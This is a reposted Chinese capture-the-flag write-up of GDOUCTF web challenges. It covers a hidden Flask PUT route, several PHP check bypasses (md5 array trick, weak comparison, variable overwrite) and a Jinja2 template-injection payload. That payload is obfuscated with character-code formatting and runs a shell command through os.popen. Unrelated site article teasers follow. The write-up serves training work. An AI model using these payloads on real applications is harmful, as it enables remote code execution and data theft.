<bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>

主頁 > 知識與問答

GDOUCTF WEB

來源：互聯網轉載時間：2023-08-15 16:47:35

web

hate eat snake

游戲題找js，將判斷語句刪掉即可

ezweb

看源碼找到/src路由，找到源碼

import flaskapp = flask.Flask(__name__)@app.route('/', methods=['GET']) def index():return flask.send_file('index.html')@app.route('/src', methods=['GET']) def source():return flask.send_file('app.py')@app.route('/super-secret-route-nobody-will-guess', methods=['PUT']) def flag():return open('flag').read()

用PUT方式訪問/super-secret-route-nobody-will-guess路由即可

受不了一點

源碼

<?php error_reporting(0); header("Content-type:text/html;charset=utf-8"); if(isset($_POST['gdou'])&&isset($_POST['ctf'])){$b=$_POST['ctf'];$a=$_POST['gdou'];if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){if(isset($_COOKIE['cookie'])){if ($_COOKIE['cookie']=='j0k3r'){if(isset($_GET['aaa']) && isset($_GET['bbb'])){$aaa=$_GET['aaa'];$bbb=$_GET['bbb'];if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){$give = 'cancanwordflag';$get ='hacker!';if(!isset($_GET['flag']) && !isset($_POST['flag'])){die($give);}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){die($get);}foreach ($_POST as $key => $value) {$$key = $value;}foreach ($_GET as $key => $value) {$$key = $$value;}echo $f1ag;}else{echo "洗洗睡吧";}}else{echo "行不行啊細狗";}} } else {echo '菜菜'; } }else{echo "就這?"; } }else{echo "別來沾邊"; } ?>

繞if語句

第一個：md5的強比較，數組可以繞過 gdou[]=1&ctf[]=2

第二個：傳入Cookie：cookie=j0k3r即可

第三個：弱比較加個+即可：aaa=114514+&bbb=114514

第四個：只要flag不為空即可：post：flag=1 GET：flag=1

EZ WEB

看一下框架

flask，多半是ssti，測試一下

fuzz字典跑一下看到只有這些沒有被過濾

看報錯是jinja2

可以用jinja2的原生函數attr

我們要構造的是

{%print config|attr('__class__')|attr(__init__)|attr('__globals__')|attr('__getitem__')('o'+'s')|attr('popen')('cat /f*')|attr('read')()%}

但()里面的都被過濾了

可以用format，格式化字符串輸出

例如

attr('%c%c%c%c%c%c%c%c%c'|format(95,95,99,108,97,115,115,95,95))

就等價與

attr('__class__')

所以就可以按照這個方法繞過

最終pyload

{%print config|attr('%c%c%c%c%c%c%c%c%c'|format(95,95,99,108,97,115,115,95,95))|attr('%c%c%c%c%c%c%c%c'|format(95,95,105,110,105,116,95,95))|attr('%c%c%c%c%c%c%c%c%c%c%c'|format(95,95,103,108,111,98,97,108,115,95,95))|attr('%c%c%c%c%c%c%c%c%c%c%c'|format(95,95,103,101,116,105,116,101,109,95,95))('o'+'s')|attr('%c%c%c%c%c'|format(112,111,112,101,110))('cat /f*')|attr('%c%c%c%c'|format(114,101,97,100))()%}

本文由 貴州做網站公司 整理發布，部分圖文來源于互聯網，如有侵權，請聯系我們刪除，謝謝！

上一篇：在Windows 7鏡像中整合“SP2”補丁

下一篇：非常好用的離線地圖APP

網站建設網站推廣 SEO 網站運營網絡營銷

網絡推廣網站優化公司

2025-05-16

網絡推廣與網站優化公司（網絡優化與推廣專家）作為數字營銷領域的核心服務提供方，其價值在于通過技術手段與策略規劃幫助企業提升線上曝光度、用戶轉化率及品牌影響力。這...

公司網站建設價格

2025-05-16

在當今數字化時代，公司網站已成為企業展示形象、傳遞信息和開展業務的重要平臺。然而，對于許多公司來說，網站建設的價格是一個關鍵考量因素。本文將圍繞“公司網站建設價...

免費企業網站建設介紹

2025-05-16

在當今的數字化時代，企業網站已成為企業展示形象、吸引客戶和開展業務的重要平臺。然而，對于許多中小企業來說，高昂的網站建設費用可能會成為其發展的瓶頸。幸運的是，隨...

安慶汽車站南站在哪安慶市汽車南站汽車站介紹？

2023-08-15

安慶汽車南站在哪？各自地安慶汽車站(地址:安慶市宜城路與華中西路交叉口)；安慶汽車南站(地址:安慶宜城路，安慶賓館旁)；安慶中心客運站(地址:206國道，廣材附近，原安慶北客運站)；安慶旅游汽車站(地址:開發區黃土坑):安慶湖濱客運站(地址:菱湖南路，安慶交通局對面)；安慶汽車二連閆飛快速公交安慶站(地址:菱湖南路與紡織南路交叉口)；安慶萍安快速客運站(地址:宜城路規劃局斜對面)；安慶城西站(地...

ai怎么把圖片轉矢量 Ai怎么轉換矢量圖并保存tif？

2023-08-04

亞馬遜echo0-com1、重新打開“ai”該軟件，將圖文拖入到該軟件里。2、將所有圖片無限擴大會覺得圖文有些虛化背景，選擇“圖像內容描繪出”下拉選項中的“低信噪比照片”。3、稍等片刻，進入頁面“快速擴展”兩個選項。4、這時所有圖片已經變為矢量軟件，清晰度很明顯，選項卡去選擇圖形后，可以看到去選擇的基本圖形都是由添加錨點工具將組。5、鼠標右鍵點擊圖片素材，在下拉列表中可以選擇“從明年起配屬”。6、...

vr主機設備推薦 vr需要什么電腦配置？

2023-08-04

要流暢的看VR電腦配置，越高越好。目前VR主要針對要求高的顯卡(與成像相關)。目前很多VR廠商都為自己的VR軟件推薦了電腦配置，但是官網查?？偟膩碚f只有幾個大項:四代以上，I5處理器8G，內存4G，顯卡，光學主機一般價格在5000以上?？梢粤鲿呈褂肰R。根據目前VR的硬件形式，VR頭戴設備主要分為三種:1.移動終端顯示器(俗稱手機VR)移動終端顯示器(手機VR)——所謂的VR眼鏡盒，只要放在手機里...

<bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>